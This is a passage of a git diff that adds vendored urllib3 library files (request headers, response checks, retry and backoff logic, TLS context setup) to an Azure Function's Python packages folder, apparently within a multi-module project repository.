+ import Queue as _unused_module_Queue # noqa: F401 + + +class LifoQueue(queue.Queue): + def _init(self, _): + self.queue = collections.deque() + + def _qsize(self, len=len): + return len(self.queue) + + def _put(self, item): + self.queue.append(item) + + def _get(self): + return self.queue.pop() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py new file mode 100644 index 0000000..eadc32d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/request.py @@ -0,0 +1,146 @@ +from __future__ import absolute_import + +from base64 import b64encode + +from ..exceptions import UnrewindableBodyError +from ..packages.six import b, integer_types + +# Pass as a value within ``headers`` to skip +# emitting some HTTP headers that are added automatically. +# The only headers that are supported are ``Accept-Encoding``, +# ``Host``, and ``User-Agent``. +SKIP_HEADER = "@@@SKIP_HEADER@@@" +SKIPPABLE_HEADERS = frozenset(["accept-encoding", "host", "user-agent"]) + +ACCEPT_ENCODING = "gzip,deflate" +try: + try: + import brotlicffi as _unused_module_brotli # noqa: F401 + except ImportError: + import brotli as _unused_module_brotli # noqa: F401 +except ImportError: + pass +else: + ACCEPT_ENCODING += ",br" + +_FAILEDTELL = object() + + +def make_headers( + keep_alive=None, + accept_encoding=None, + user_agent=None, + basic_auth=None, + proxy_basic_auth=None, + disable_cache=None, +): + """ + Shortcuts for generating request headers. + + :param keep_alive: + If ``True``, adds 'connection: keep-alive' header. + + :param accept_encoding: + Can be a boolean, list, or string. + ``True`` translates to 'gzip,deflate'. + List will get joined by comma. + String will be used as provided. + + :param user_agent: + String representing the user-agent you want, such as + "python-urllib3/0.6" + + :param basic_auth: + Colon-separated username:password string for 'authorization: basic ...' + auth header. + + :param proxy_basic_auth: + Colon-separated username:password string for 'proxy-authorization: basic ...' + auth header. + + :param disable_cache: + If ``True``, adds 'cache-control: no-cache' header. + + Example:: + + >>> make_headers(keep_alive=True, user_agent="Batman/1.0") + {'connection': 'keep-alive', 'user-agent': 'Batman/1.0'} + >>> make_headers(accept_encoding=True) + {'accept-encoding': 'gzip,deflate'} + """ + headers = {} + if accept_encoding: + if isinstance(accept_encoding, str): + pass + elif isinstance(accept_encoding, list): + accept_encoding = ",".join(accept_encoding) + else: + accept_encoding = ACCEPT_ENCODING + headers["accept-encoding"] = accept_encoding + + if user_agent: + headers["user-agent"] = user_agent + + if keep_alive: + headers["connection"] = "keep-alive" + + if basic_auth: + headers["authorization"] = "Basic " + b64encode(b(basic_auth)).decode("utf-8") + + if proxy_basic_auth: + headers["proxy-authorization"] = "Basic " + b64encode( + b(proxy_basic_auth) + ).decode("utf-8") + + if disable_cache: + headers["cache-control"] = "no-cache" + + return headers + + +def set_file_position(body, pos): + """ + If a position is provided, move file to that point. + Otherwise, we'll attempt to record a position for future use. 
+ """ + if pos is not None: + rewind_body(body, pos) + elif getattr(body, "tell", None) is not None: + try: + pos = body.tell() + except (IOError, OSError): + # This differentiates from None, allowing us to catch + # a failed `tell()` later when trying to rewind the body. + pos = _FAILEDTELL + + return pos + + +def rewind_body(body, body_pos): + """ + Attempt to rewind body to a certain position. + Primarily used for request redirects and retries. + + :param body: + File-like object that supports seek. + + :param int pos: + Position to seek to in file. + """ + body_seek = getattr(body, "seek", None) + if body_seek is not None and isinstance(body_pos, integer_types): + try: + body_seek(body_pos) + except (IOError, OSError): + raise UnrewindableBodyError( + "An error occurred when rewinding request body for redirect/retry." + ) + elif body_pos is _FAILEDTELL: + raise UnrewindableBodyError( + "Unable to record file position for rewinding " + "request body during a redirect/retry." + ) + else: + raise ValueError( + "body_pos must be of type integer, instead it was %s." % type(body_pos) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py new file mode 100644 index 0000000..487103a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/response.py @@ -0,0 +1,107 @@ +from __future__ import absolute_import + +from email.errors import MultipartInvariantViolationDefect, StartBoundaryNotFoundDefect + +from ..exceptions import HeaderParsingError +from ..packages.six.moves import http_client as httplib + + +def is_fp_closed(obj): + """ + Checks whether a given file-like object is closed. + + :param obj: + The file-like object to check. + """ + + try: + # Check `isclosed()` first, in case Python3 doesn't set `closed`. + # GH Issue #928 + return obj.isclosed() + except AttributeError: + pass + + try: + # Check via the official file-like-object way. + return obj.closed + except AttributeError: + pass + + try: + # Check if the object is a container for another file-like object that + # gets released on exhaustion (e.g. HTTPResponse). + return obj.fp is None + except AttributeError: + pass + + raise ValueError("Unable to determine whether fp is closed.") + + +def assert_header_parsing(headers): + """ + Asserts whether all headers have been successfully parsed. + Extracts encountered errors from the result of parsing headers. + + Only works on Python 3. + + :param http.client.HTTPMessage headers: Headers to verify. + + :raises urllib3.exceptions.HeaderParsingError: + If parsing errors are found. + """ + + # This will fail silently if we pass in the wrong kind of parameter. + # To make debugging easier add an explicit check. 
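# A sketch of the rewind helpers defined above, as used for redirects and
# retries: record the body position before the first attempt, then seek
# back before resending.
import io
from urllib3.util.request import rewind_body, set_file_position

body = io.BytesIO(b"payload")
pos = set_file_position(body, None)  # records body.tell() -> 0
body.read()                          # first attempt consumes the body
rewind_body(body, pos)               # rewind so the retry can resend it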
+ if not isinstance(headers, httplib.HTTPMessage): + raise TypeError("expected httplib.Message, got {0}.".format(type(headers))) + + defects = getattr(headers, "defects", None) + get_payload = getattr(headers, "get_payload", None) + + unparsed_data = None + if get_payload: + # get_payload is actually email.message.Message.get_payload; + # we're only interested in the result if it's not a multipart message + if not headers.is_multipart(): + payload = get_payload() + + if isinstance(payload, (bytes, str)): + unparsed_data = payload + if defects: + # httplib is assuming a response body is available + # when parsing headers even when httplib only sends + # header data to parse_headers() This results in + # defects on multipart responses in particular. + # See: https://github.com/urllib3/urllib3/issues/800 + + # So we ignore the following defects: + # - StartBoundaryNotFoundDefect: + # The claimed start boundary was never found. + # - MultipartInvariantViolationDefect: + # A message claimed to be a multipart but no subparts were found. + defects = [ + defect + for defect in defects + if not isinstance( + defect, (StartBoundaryNotFoundDefect, MultipartInvariantViolationDefect) + ) + ] + + if defects or unparsed_data: + raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data) + + +def is_response_to_head(response): + """ + Checks whether the request of a response has been a HEAD-request. + Handles the quirks of AppEngine. + + :param http.client.HTTPResponse response: + Response to check if the originating request + used 'HEAD' as a method. + """ + # FIXME: Can we do this somehow without accessing private httplib _method? + method = response._method + if isinstance(method, int): # Platform-specific: Appengine + return method == 3 + return method.upper() == "HEAD" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py new file mode 100644 index 0000000..b44c60a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/retry.py @@ -0,0 +1,620 @@ +from __future__ import absolute_import + +import email +import logging +import re +import time +import warnings +from collections import namedtuple +from itertools import takewhile + +from ..exceptions import ( + ConnectTimeoutError, + InvalidHeader, + MaxRetryError, + ProtocolError, + ProxyError, + ReadTimeoutError, + ResponseError, +) +from ..packages import six + +log = logging.getLogger(__name__) + + +# Data structure for representing the metadata of requests that result in a retry. +RequestHistory = namedtuple( + "RequestHistory", ["method", "url", "error", "status", "redirect_location"] +) + + +# TODO: In v2 we can remove this sentinel and metaclass with deprecated options. +_Default = object() + + +class _RetryMeta(type): + @property + def DEFAULT_METHOD_WHITELIST(cls): + warnings.warn( + "Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_ALLOWED_METHODS' instead", + DeprecationWarning, + ) + return cls.DEFAULT_ALLOWED_METHODS + + @DEFAULT_METHOD_WHITELIST.setter + def DEFAULT_METHOD_WHITELIST(cls, value): + warnings.warn( + "Using 'Retry.DEFAULT_METHOD_WHITELIST' is deprecated and " + "will be removed in v2.0. 
Use 'Retry.DEFAULT_ALLOWED_METHODS' instead", + DeprecationWarning, + ) + cls.DEFAULT_ALLOWED_METHODS = value + + @property + def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls): + warnings.warn( + "Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead", + DeprecationWarning, + ) + return cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT + + @DEFAULT_REDIRECT_HEADERS_BLACKLIST.setter + def DEFAULT_REDIRECT_HEADERS_BLACKLIST(cls, value): + warnings.warn( + "Using 'Retry.DEFAULT_REDIRECT_HEADERS_BLACKLIST' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_REMOVE_HEADERS_ON_REDIRECT' instead", + DeprecationWarning, + ) + cls.DEFAULT_REMOVE_HEADERS_ON_REDIRECT = value + + @property + def BACKOFF_MAX(cls): + warnings.warn( + "Using 'Retry.BACKOFF_MAX' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead", + DeprecationWarning, + ) + return cls.DEFAULT_BACKOFF_MAX + + @BACKOFF_MAX.setter + def BACKOFF_MAX(cls, value): + warnings.warn( + "Using 'Retry.BACKOFF_MAX' is deprecated and " + "will be removed in v2.0. Use 'Retry.DEFAULT_BACKOFF_MAX' instead", + DeprecationWarning, + ) + cls.DEFAULT_BACKOFF_MAX = value + + +@six.add_metaclass(_RetryMeta) +class Retry(object): + """Retry configuration. + + Each retry attempt will create a new Retry object with updated values, so + they can be safely reused. + + Retries can be defined as a default for a pool:: + + retries = Retry(connect=5, read=2, redirect=5) + http = PoolManager(retries=retries) + response = http.request('GET', 'http://example.com/') + + Or per-request (which overrides the default for the pool):: + + response = http.request('GET', 'http://example.com/', retries=Retry(10)) + + Retries can be disabled by passing ``False``:: + + response = http.request('GET', 'http://example.com/', retries=False) + + Errors will be wrapped in :class:`~urllib3.exceptions.MaxRetryError` unless + retries are disabled, in which case the causing exception will be raised. + + :param int total: + Total number of retries to allow. Takes precedence over other counts. + + Set to ``None`` to remove this constraint and fall back on other + counts. + + Set to ``0`` to fail on the first retry. + + Set to ``False`` to disable and imply ``raise_on_redirect=False``. + + :param int connect: + How many connection-related errors to retry on. + + These are errors raised before the request is sent to the remote server, + which we assume has not triggered the server to process the request. + + Set to ``0`` to fail on the first retry of this type. + + :param int read: + How many times to retry on read errors. + + These errors are raised after the request was sent to the server, so the + request may have side-effects. + + Set to ``0`` to fail on the first retry of this type. + + :param int redirect: + How many redirects to perform. Limit this to avoid infinite redirect + loops. + + A redirect is a HTTP response with a status code 301, 302, 303, 307 or + 308. + + Set to ``0`` to fail on the first retry of this type. + + Set to ``False`` to disable and imply ``raise_on_redirect=False``. + + :param int status: + How many times to retry on bad status codes. + + These are retries made on responses, where status code matches + ``status_forcelist``. + + Set to ``0`` to fail on the first retry of this type. + + :param int other: + How many times to retry on other errors. + + Other errors are errors that are not connect, read, redirect or status errors. 
+ These errors might be raised after the request was sent to the server, so the + request might have side-effects. + + Set to ``0`` to fail on the first retry of this type. + + If ``total`` is not set, it's a good idea to set this to 0 to account + for unexpected edge cases and avoid infinite retry loops. + + :param iterable allowed_methods: + Set of uppercased HTTP method verbs that we should retry on. + + By default, we only retry on methods which are considered to be + idempotent (multiple requests with the same parameters end with the + same state). See :attr:`Retry.DEFAULT_ALLOWED_METHODS`. + + Set to a ``False`` value to retry on any verb. + + .. warning:: + + Previously this parameter was named ``method_whitelist``, that + usage is deprecated in v1.26.0 and will be removed in v2.0. + + :param iterable status_forcelist: + A set of integer HTTP status codes that we should force a retry on. + A retry is initiated if the request method is in ``allowed_methods`` + and the response status code is in ``status_forcelist``. + + By default, this is disabled with ``None``. + + :param float backoff_factor: + A backoff factor to apply between attempts after the second try + (most errors are resolved immediately by a second try without a + delay). urllib3 will sleep for:: + + {backoff factor} * (2 ** ({number of total retries} - 1)) + + seconds. If the backoff_factor is 0.1, then :func:`.sleep` will sleep + for [0.0s, 0.2s, 0.4s, ...] between retries. It will never be longer + than :attr:`Retry.DEFAULT_BACKOFF_MAX`. + + By default, backoff is disabled (set to 0). + + :param bool raise_on_redirect: Whether, if the number of redirects is + exhausted, to raise a MaxRetryError, or to return a response with a + response code in the 3xx range. + + :param bool raise_on_status: Similar meaning to ``raise_on_redirect``: + whether we should raise an exception, or return a response, + if status falls in ``status_forcelist`` range and retries have + been exhausted. + + :param tuple history: The history of the request encountered during + each call to :meth:`~Retry.increment`. The list is in the order + the requests occurred. Each list item is of class :class:`RequestHistory`. + + :param bool respect_retry_after_header: + Whether to respect Retry-After header on status codes defined as + :attr:`Retry.RETRY_AFTER_STATUS_CODES` or not. + + :param iterable remove_headers_on_redirect: + Sequence of headers to remove from the request when a response + indicating a redirect is returned before firing off the redirected + request. + """ + + #: Default methods to be used for ``allowed_methods`` + DEFAULT_ALLOWED_METHODS = frozenset( + ["HEAD", "GET", "PUT", "DELETE", "OPTIONS", "TRACE"] + ) + + #: Default status codes to be used for ``status_forcelist`` + RETRY_AFTER_STATUS_CODES = frozenset([413, 429, 503]) + + #: Default headers to be used for ``remove_headers_on_redirect`` + DEFAULT_REMOVE_HEADERS_ON_REDIRECT = frozenset(["Authorization"]) + + #: Maximum backoff time. 
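# A sketch of the schedule get_backoff_time() (further below) produces: no
# delay before the first retry, then backoff_factor * 2**(n - 1) seconds,
# capped at DEFAULT_BACKOFF_MAX (120 by default, defined just below).
def backoff_schedule(backoff_factor, attempts, cap=120):
    return [
        0 if n <= 1 else min(cap, backoff_factor * (2 ** (n - 1)))
        for n in range(1, attempts + 1)
    ]

backoff_schedule(0.1, 5)  # -> [0, 0.2, 0.4, 0.8, 1.6]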
+ DEFAULT_BACKOFF_MAX = 120 + + def __init__( + self, + total=10, + connect=None, + read=None, + redirect=None, + status=None, + other=None, + allowed_methods=_Default, + status_forcelist=None, + backoff_factor=0, + raise_on_redirect=True, + raise_on_status=True, + history=None, + respect_retry_after_header=True, + remove_headers_on_redirect=_Default, + # TODO: Deprecated, remove in v2.0 + method_whitelist=_Default, + ): + + if method_whitelist is not _Default: + if allowed_methods is not _Default: + raise ValueError( + "Using both 'allowed_methods' and " + "'method_whitelist' together is not allowed. " + "Instead only use 'allowed_methods'" + ) + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + stacklevel=2, + ) + allowed_methods = method_whitelist + if allowed_methods is _Default: + allowed_methods = self.DEFAULT_ALLOWED_METHODS + if remove_headers_on_redirect is _Default: + remove_headers_on_redirect = self.DEFAULT_REMOVE_HEADERS_ON_REDIRECT + + self.total = total + self.connect = connect + self.read = read + self.status = status + self.other = other + + if redirect is False or total is False: + redirect = 0 + raise_on_redirect = False + + self.redirect = redirect + self.status_forcelist = status_forcelist or set() + self.allowed_methods = allowed_methods + self.backoff_factor = backoff_factor + self.raise_on_redirect = raise_on_redirect + self.raise_on_status = raise_on_status + self.history = history or tuple() + self.respect_retry_after_header = respect_retry_after_header + self.remove_headers_on_redirect = frozenset( + [h.lower() for h in remove_headers_on_redirect] + ) + + def new(self, **kw): + params = dict( + total=self.total, + connect=self.connect, + read=self.read, + redirect=self.redirect, + status=self.status, + other=self.other, + status_forcelist=self.status_forcelist, + backoff_factor=self.backoff_factor, + raise_on_redirect=self.raise_on_redirect, + raise_on_status=self.raise_on_status, + history=self.history, + remove_headers_on_redirect=self.remove_headers_on_redirect, + respect_retry_after_header=self.respect_retry_after_header, + ) + + # TODO: If already given in **kw we use what's given to us + # If not given we need to figure out what to pass. We decide + # based on whether our class has the 'method_whitelist' property + # and if so we pass the deprecated 'method_whitelist' otherwise + # we use 'allowed_methods'. Remove in v2.0 + if "method_whitelist" not in kw and "allowed_methods" not in kw: + if "method_whitelist" in self.__dict__: + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. 
Use 'allowed_methods' instead", + DeprecationWarning, + ) + params["method_whitelist"] = self.allowed_methods + else: + params["allowed_methods"] = self.allowed_methods + + params.update(kw) + return type(self)(**params) + + @classmethod + def from_int(cls, retries, redirect=True, default=None): + """Backwards-compatibility for the old retries format.""" + if retries is None: + retries = default if default is not None else cls.DEFAULT + + if isinstance(retries, Retry): + return retries + + redirect = bool(redirect) and None + new_retries = cls(retries, redirect=redirect) + log.debug("Converted retries value: %r -> %r", retries, new_retries) + return new_retries + + def get_backoff_time(self): + """Formula for computing the current backoff + + :rtype: float + """ + # We want to consider only the last consecutive errors sequence (Ignore redirects). + consecutive_errors_len = len( + list( + takewhile(lambda x: x.redirect_location is None, reversed(self.history)) + ) + ) + if consecutive_errors_len <= 1: + return 0 + + backoff_value = self.backoff_factor * (2 ** (consecutive_errors_len - 1)) + return min(self.DEFAULT_BACKOFF_MAX, backoff_value) + + def parse_retry_after(self, retry_after): + # Whitespace: https://tools.ietf.org/html/rfc7230#section-3.2.4 + if re.match(r"^\s*[0-9]+\s*$", retry_after): + seconds = int(retry_after) + else: + retry_date_tuple = email.utils.parsedate_tz(retry_after) + if retry_date_tuple is None: + raise InvalidHeader("Invalid Retry-After header: %s" % retry_after) + if retry_date_tuple[9] is None: # Python 2 + # Assume UTC if no timezone was specified + # On Python2.7, parsedate_tz returns None for a timezone offset + # instead of 0 if no timezone is given, where mktime_tz treats + # a None timezone offset as local time. + retry_date_tuple = retry_date_tuple[:9] + (0,) + retry_date_tuple[10:] + + retry_date = email.utils.mktime_tz(retry_date_tuple) + seconds = retry_date - time.time() + + if seconds < 0: + seconds = 0 + + return seconds + + def get_retry_after(self, response): + """Get the value of Retry-After in seconds.""" + + retry_after = response.getheader("Retry-After") + + if retry_after is None: + return None + + return self.parse_retry_after(retry_after) + + def sleep_for_retry(self, response=None): + retry_after = self.get_retry_after(response) + if retry_after: + time.sleep(retry_after) + return True + + return False + + def _sleep_backoff(self): + backoff = self.get_backoff_time() + if backoff <= 0: + return + time.sleep(backoff) + + def sleep(self, response=None): + """Sleep between retry attempts. + + This method will respect a server's ``Retry-After`` response header + and sleep the duration of the time requested. If that is not present, it + will use an exponential backoff. By default, the backoff factor is 0 and + this method will return immediately. + """ + + if self.respect_retry_after_header and response: + slept = self.sleep_for_retry(response) + if slept: + return + + self._sleep_backoff() + + def _is_connection_error(self, err): + """Errors when we're fairly sure that the server did not receive the + request, so it should be safe to retry. + """ + if isinstance(err, ProxyError): + err = err.original_error + return isinstance(err, ConnectTimeoutError) + + def _is_read_error(self, err): + """Errors that occur after the request has been started, so we should + assume that the server began processing it. 
+ """ + return isinstance(err, (ReadTimeoutError, ProtocolError)) + + def _is_method_retryable(self, method): + """Checks if a given HTTP method should be retried upon, depending if + it is included in the allowed_methods + """ + # TODO: For now favor if the Retry implementation sets its own method_whitelist + # property outside of our constructor to avoid breaking custom implementations. + if "method_whitelist" in self.__dict__: + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + ) + allowed_methods = self.method_whitelist + else: + allowed_methods = self.allowed_methods + + if allowed_methods and method.upper() not in allowed_methods: + return False + return True + + def is_retry(self, method, status_code, has_retry_after=False): + """Is this method/status code retryable? (Based on allowlists and control + variables such as the number of total retries to allow, whether to + respect the Retry-After header, whether this header is present, and + whether the returned status code is on the list of status codes to + be retried upon on the presence of the aforementioned header) + """ + if not self._is_method_retryable(method): + return False + + if self.status_forcelist and status_code in self.status_forcelist: + return True + + return ( + self.total + and self.respect_retry_after_header + and has_retry_after + and (status_code in self.RETRY_AFTER_STATUS_CODES) + ) + + def is_exhausted(self): + """Are we out of retries?""" + retry_counts = ( + self.total, + self.connect, + self.read, + self.redirect, + self.status, + self.other, + ) + retry_counts = list(filter(None, retry_counts)) + if not retry_counts: + return False + + return min(retry_counts) < 0 + + def increment( + self, + method=None, + url=None, + response=None, + error=None, + _pool=None, + _stacktrace=None, + ): + """Return a new Retry object with incremented retry counters. + + :param response: A response object, or None, if the server did not + return a response. + :type response: :class:`~urllib3.response.HTTPResponse` + :param Exception error: An error encountered during the request, or + None if the response was received successfully. + + :return: A new ``Retry`` object. + """ + if self.total is False and error: + # Disabled, indicate to re-raise the error. + raise six.reraise(type(error), error, _stacktrace) + + total = self.total + if total is not None: + total -= 1 + + connect = self.connect + read = self.read + redirect = self.redirect + status_count = self.status + other = self.other + cause = "unknown" + status = None + redirect_location = None + + if error and self._is_connection_error(error): + # Connect retry? + if connect is False: + raise six.reraise(type(error), error, _stacktrace) + elif connect is not None: + connect -= 1 + + elif error and self._is_read_error(error): + # Read retry? + if read is False or not self._is_method_retryable(method): + raise six.reraise(type(error), error, _stacktrace) + elif read is not None: + read -= 1 + + elif error: + # Other retry? + if other is not None: + other -= 1 + + elif response and response.get_redirect_location(): + # Redirect retry? 
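# A sketch of how increment() drains these counters, assuming only this
# file's Retry plus urllib3.exceptions: each call returns a new Retry with
# the relevant counters decremented, and MaxRetryError is raised once any
# counter sinks below zero.
from urllib3.exceptions import ConnectTimeoutError
from urllib3.util.retry import Retry

retries = Retry(total=2, connect=1)
retries = retries.increment(error=ConnectTimeoutError())  # total=1, connect=0
retries.increment(error=ConnectTimeoutError())            # raises MaxRetryError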
+ if redirect is not None: + redirect -= 1 + cause = "too many redirects" + redirect_location = response.get_redirect_location() + status = response.status + + else: + # Incrementing because of a server error like a 500 in + # status_forcelist and the given method is in the allowed_methods + cause = ResponseError.GENERIC_ERROR + if response and response.status: + if status_count is not None: + status_count -= 1 + cause = ResponseError.SPECIFIC_ERROR.format(status_code=response.status) + status = response.status + + history = self.history + ( + RequestHistory(method, url, error, status, redirect_location), + ) + + new_retry = self.new( + total=total, + connect=connect, + read=read, + redirect=redirect, + status=status_count, + other=other, + history=history, + ) + + if new_retry.is_exhausted(): + raise MaxRetryError(_pool, url, error or ResponseError(cause)) + + log.debug("Incremented Retry for (url='%s'): %r", url, new_retry) + + return new_retry + + def __repr__(self): + return ( + "{cls.__name__}(total={self.total}, connect={self.connect}, " + "read={self.read}, redirect={self.redirect}, status={self.status})" + ).format(cls=type(self), self=self) + + def __getattr__(self, item): + if item == "method_whitelist": + # TODO: Remove this deprecated alias in v2.0 + warnings.warn( + "Using 'method_whitelist' with Retry is deprecated and " + "will be removed in v2.0. Use 'allowed_methods' instead", + DeprecationWarning, + ) + return self.allowed_methods + try: + return getattr(super(Retry, self), item) + except AttributeError: + return getattr(Retry, item) + + +# For backwards compatibility (equivalent to pre-v1.9): +Retry.DEFAULT = Retry(3) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py new file mode 100644 index 0000000..8577a08 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/urllib3/util/ssl_.py @@ -0,0 +1,495 @@ +from __future__ import absolute_import + +import hmac +import os +import sys +import warnings +from binascii import hexlify, unhexlify +from hashlib import md5, sha1, sha256 + +from ..exceptions import ( + InsecurePlatformWarning, + ProxySchemeUnsupported, + SNIMissingWarning, + SSLError, +) +from ..packages import six +from .url import BRACELESS_IPV6_ADDRZ_RE, IPV4_RE + +SSLContext = None +SSLTransport = None +HAS_SNI = False +IS_PYOPENSSL = False +IS_SECURETRANSPORT = False +ALPN_PROTOCOLS = ["http/1.1"] + +# Maps the length of a digest to a possible hash function producing this digest +HASHFUNC_MAP = {32: md5, 40: sha1, 64: sha256} + + +def _const_compare_digest_backport(a, b): + """ + Compare two digests of equal length in constant time. + + The digests must be of type str/bytes. + Returns True if the digests match, and False otherwise. + """ + result = abs(len(a) - len(b)) + for left, right in zip(bytearray(a), bytearray(b)): + result |= left ^ right + return result == 0 + + +_const_compare_digest = getattr(hmac, "compare_digest", _const_compare_digest_backport) + +try: # Test for SSL features + import ssl + from ssl import CERT_REQUIRED, wrap_socket +except ImportError: + pass + +try: + from ssl import HAS_SNI # Has SNI? 
+except ImportError: + pass + +try: + from .ssltransport import SSLTransport +except ImportError: + pass + + +try: # Platform-specific: Python 3.6 + from ssl import PROTOCOL_TLS + + PROTOCOL_SSLv23 = PROTOCOL_TLS +except ImportError: + try: + from ssl import PROTOCOL_SSLv23 as PROTOCOL_TLS + + PROTOCOL_SSLv23 = PROTOCOL_TLS + except ImportError: + PROTOCOL_SSLv23 = PROTOCOL_TLS = 2 + +try: + from ssl import PROTOCOL_TLS_CLIENT +except ImportError: + PROTOCOL_TLS_CLIENT = PROTOCOL_TLS + + +try: + from ssl import OP_NO_COMPRESSION, OP_NO_SSLv2, OP_NO_SSLv3 +except ImportError: + OP_NO_SSLv2, OP_NO_SSLv3 = 0x1000000, 0x2000000 + OP_NO_COMPRESSION = 0x20000 + + +try: # OP_NO_TICKET was added in Python 3.6 + from ssl import OP_NO_TICKET +except ImportError: + OP_NO_TICKET = 0x4000 + + +# A secure default. +# Sources for more information on TLS ciphers: +# +# - https://wiki.mozilla.org/Security/Server_Side_TLS +# - https://www.ssllabs.com/projects/best-practices/index.html +# - https://hynek.me/articles/hardening-your-web-servers-ssl-ciphers/ +# +# The general intent is: +# - prefer cipher suites that offer perfect forward secrecy (DHE/ECDHE), +# - prefer ECDHE over DHE for better performance, +# - prefer any AES-GCM and ChaCha20 over any AES-CBC for better performance and +# security, +# - prefer AES-GCM over ChaCha20 because hardware-accelerated AES is common, +# - disable NULL authentication, MD5 MACs, DSS, and other +# insecure ciphers for security reasons. +# - NOTE: TLS 1.3 cipher suites are managed through a different interface +# not exposed by CPython (yet!) and are enabled by default if they're available. +DEFAULT_CIPHERS = ":".join( + [ + "ECDHE+AESGCM", + "ECDHE+CHACHA20", + "DHE+AESGCM", + "DHE+CHACHA20", + "ECDH+AESGCM", + "DH+AESGCM", + "ECDH+AES", + "DH+AES", + "RSA+AESGCM", + "RSA+AES", + "!aNULL", + "!eNULL", + "!MD5", + "!DSS", + ] +) + +try: + from ssl import SSLContext # Modern SSL? +except ImportError: + + class SSLContext(object): # Platform-specific: Python 2 + def __init__(self, protocol_version): + self.protocol = protocol_version + # Use default values from a real SSLContext + self.check_hostname = False + self.verify_mode = ssl.CERT_NONE + self.ca_certs = None + self.options = 0 + self.certfile = None + self.keyfile = None + self.ciphers = None + + def load_cert_chain(self, certfile, keyfile): + self.certfile = certfile + self.keyfile = keyfile + + def load_verify_locations(self, cafile=None, capath=None, cadata=None): + self.ca_certs = cafile + + if capath is not None: + raise SSLError("CA directories not supported in older Pythons") + + if cadata is not None: + raise SSLError("CA data not supported in older Pythons") + + def set_ciphers(self, cipher_suite): + self.ciphers = cipher_suite + + def wrap_socket(self, socket, server_hostname=None, server_side=False): + warnings.warn( + "A true SSLContext object is not available. This prevents " + "urllib3 from configuring SSL appropriately and may cause " + "certain SSL connections to fail. You can upgrade to a newer " + "version of Python to solve this. 
For more information, see " + "https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html" + "#ssl-warnings", + InsecurePlatformWarning, + ) + kwargs = { + "keyfile": self.keyfile, + "certfile": self.certfile, + "ca_certs": self.ca_certs, + "cert_reqs": self.verify_mode, + "ssl_version": self.protocol, + "server_side": server_side, + } + return wrap_socket(socket, ciphers=self.ciphers, **kwargs) + + +def assert_fingerprint(cert, fingerprint): + """ + Checks if given fingerprint matches the supplied certificate. + + :param cert: + Certificate as bytes object. + :param fingerprint: + Fingerprint as string of hexdigits, can be interspersed by colons. + """ + + fingerprint = fingerprint.replace(":", "").lower() + digest_length = len(fingerprint) + hashfunc = HASHFUNC_MAP.get(digest_length) + if not hashfunc: + raise SSLError("Fingerprint of invalid length: {0}".format(fingerprint)) + + # We need encode() here for py32; works on py2 and p33. + fingerprint_bytes = unhexlify(fingerprint.encode()) + + cert_digest = hashfunc(cert).digest() + + if not _const_compare_digest(cert_digest, fingerprint_bytes): + raise SSLError( + 'Fingerprints did not match. Expected "{0}", got "{1}".'.format( + fingerprint, hexlify(cert_digest) + ) + ) + + +def resolve_cert_reqs(candidate): + """ + Resolves the argument to a numeric constant, which can be passed to + the wrap_socket function/method from the ssl module. + Defaults to :data:`ssl.CERT_REQUIRED`. + If given a string it is assumed to be the name of the constant in the + :mod:`ssl` module or its abbreviation. + (So you can specify `REQUIRED` instead of `CERT_REQUIRED`. + If it's neither `None` nor a string we assume it is already the numeric + constant which can directly be passed to wrap_socket. + """ + if candidate is None: + return CERT_REQUIRED + + if isinstance(candidate, str): + res = getattr(ssl, candidate, None) + if res is None: + res = getattr(ssl, "CERT_" + candidate) + return res + + return candidate + + +def resolve_ssl_version(candidate): + """ + like resolve_cert_reqs + """ + if candidate is None: + return PROTOCOL_TLS + + if isinstance(candidate, str): + res = getattr(ssl, candidate, None) + if res is None: + res = getattr(ssl, "PROTOCOL_" + candidate) + return res + + return candidate + + +def create_urllib3_context( + ssl_version=None, cert_reqs=None, options=None, ciphers=None +): + """All arguments have the same meaning as ``ssl_wrap_socket``. + + By default, this function does a lot of the same work that + ``ssl.create_default_context`` does on Python 3.4+. It: + + - Disables SSLv2, SSLv3, and compression + - Sets a restricted set of server ciphers + + If you wish to enable SSLv3, you can do:: + + from urllib3.util import ssl_ + context = ssl_.create_urllib3_context() + context.options &= ~ssl_.OP_NO_SSLv3 + + You can do the same to enable compression (substituting ``COMPRESSION`` + for ``SSLv3`` in the last line above). + + :param ssl_version: + The desired protocol version to use. This will default to + PROTOCOL_SSLv23 which will negotiate the highest protocol that both + the server and your installation of OpenSSL support. + :param cert_reqs: + Whether to require the certificate verification. This defaults to + ``ssl.CERT_REQUIRED``. + :param options: + Specific 